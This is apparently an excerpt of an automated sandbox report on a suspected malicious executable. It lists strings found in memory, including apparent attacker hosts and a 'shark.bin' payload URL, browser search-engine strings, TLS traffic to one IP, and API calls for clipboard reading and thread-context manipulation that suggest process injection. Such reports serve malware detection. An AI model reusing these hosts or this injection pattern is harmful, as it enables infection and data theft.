00000000.00000003.1494664228.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1469850554.0000000000694000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bxattlepath.digital/tem
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000002.1510012790.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494732558.00000000006EB000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1476995322.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1509334947.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494664228.00000000006DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bxattlepath.digital/uu
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000002.1509913195.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1476995322.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1469850554.0000000000694000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bxattlepath.digital:443/ogdaI
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1375803058.0000000003568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1375803058.0000000003568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1375803058.0000000003568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1375803058.0000000003568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1375803058.0000000003568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1375803058.0000000003568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1375803058.0000000003568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000002.1510036268.00000000006FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://h1.mockupeastcoast.shop/l
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000002.1510036268.00000000006FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://h1.mockupeastcoast.shop/shark.bin
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000002.1509913195.0000000000694000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://h1.mockupeastcoast.shop/shark.binO
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000002.1509913195.0000000000694000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://h1.mockupeastcoast.shop:443/shark.bin
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeString found in binary or memory: https://sectigo.com/CPS0
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1404628804.000000000366F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1404628804.000000000366F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1375803058.0000000003568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1375803058.0000000003568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1404628804.000000000366F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1404628804.000000000366F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1404628804.000000000366F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1404628804.000000000366F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1404628804.000000000366F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
            Source: unknownHTTPS traffic detected: 172.67.157.7:443 -> 192.168.2.4:49721 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.157.7:443 -> 192.168.2.4:49723 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.157.7:443 -> 192.168.2.4:49724 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.157.7:443 -> 192.168.2.4:49725 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.157.7:443 -> 192.168.2.4:49726 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.157.7:443 -> 192.168.2.4:49727 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.157.7:443 -> 192.168.2.4:49728 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.157.7:443 -> 192.168.2.4:49729 version: TLS 1.2
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C5D580 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,0_3_00C5D580
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C5D580 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,0_3_00C5D580
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_004C10E8 NtTerminateThread,0_3_004C10E8
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_004C0B72 NtGetContextThread,NtSetContextThread,NtResumeThread,0_3_004C0B72
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_004C0CD8 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_3_004C0CD8
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_004C066E NtProtectVirtualMemory,0_3_004C066E
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_004620FC NtFreeVirtualMemory,0_2_004620FC
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_004620A9 NtAllocateVirtualMemory,0_2_004620A9
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_2_0046213A NtProtectVirtualMemory,0_2_0046213A
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C560400_3_00C56040
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C4E2A00_3_00C4E2A0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C464E00_3_00C464E0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C2D4900_3_00C2D490
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C354440_3_00C35444
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C634300_3_00C63430
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C675800_3_00C67580
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C2B6D00_3_00C2B6D0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C367200_3_00C36720
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C398D00_3_00C398D0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C638F00_3_00C638F0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C2D9F00_3_00C2D9F0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C6EB100_3_00C6EB10
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C3FCB00_3_00C3FCB0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C6DED00_3_00C6DED0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C560DB0_3_00C560DB
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C220400_3_00C22040
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C6C0600_3_00C6C060
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C410150_3_00C41015
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C4D1C10_3_00C4D1C1
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C551D70_3_00C551D7
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C431E00_3_00C431E0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C621A10_3_00C621A1
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C291600_3_00C29160
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C231100_3_00C23110
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C2C2F00_3_00C2C2F0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C5D2F00_3_00C5D2F0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C602FA0_3_00C602FA
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C442900_3_00C44290
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C2F2A90_3_00C2F2A9
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C362B00_3_00C362B0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C512100_3_00C51210
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C652100_3_00C65210
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C3D36F0_3_00C3D36F
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C633000_3_00C63300
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C544C60_3_00C544C6
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C6B4F00_3_00C6B4F0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C5F4FE0_3_00C5F4FE
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C544770_3_00C54477
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C224100_3_00C22410
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C6E4100_3_00C6E410
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C415350_3_00C41535
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C286D00_3_00C286D0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C476900_3_00C47690
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C2B6000_3_00C2B600
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C567C00_3_00C567C0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C6E7900_3_00C6E790
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C3B7720_3_00C3B772
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C347240_3_00C34724
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C6D8900_3_00C6D890
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C2C8A00_3_00C2C8A0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C5B8B10_3_00C5B8B1
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C6B8000_3_00C6B800
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C5A8100_3_00C5A810
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C279E00_3_00C279E0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C3D9A70_3_00C3D9A7
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C2A9400_3_00C2A940
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C4B9760_3_00C4B976
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C699700_3_00C69970
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C579020_3_00C57902
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C509090_3_00C50909
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C5891F0_3_00C5891F
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C649300_3_00C64930
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C2FAE00_3_00C2FAE0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C62AF00_3_00C62AF0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C65AA90_3_00C65AA9
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C23AB00_3_00C23AB0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C45A000_3_00C45A00
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C5EBC20_3_00C5EBC2
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C3ABDA0_3_00C3ABDA
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C28BE00_3_00C28BE0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C5AB300_3_00C5AB30
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C30C100_3_00C30C10
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C6BC300_3_00C6BC30
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C3DDC20_3_00C3DDC2
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C43DD00_3_00C43DD0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C54DAE0_3_00C54DAE
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C48DDF0_3_00C48DDF
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C2BDB00_3_00C2BDB0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C54DB00_3_00C54DB0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C60DB00_3_00C60DB0
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C62D500_3_00C62D50
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C4BD6A0_3_00C4BD6A
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C42D100_3_00C42D10
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C35D3F0_3_00C35D3F
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C33ED20_3_00C33ED2
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C3BE010_3_00C3BE01
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C31E190_3_00C31E19
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeCode function: 0_3_00C3EFCF0_3_00C3EFCF
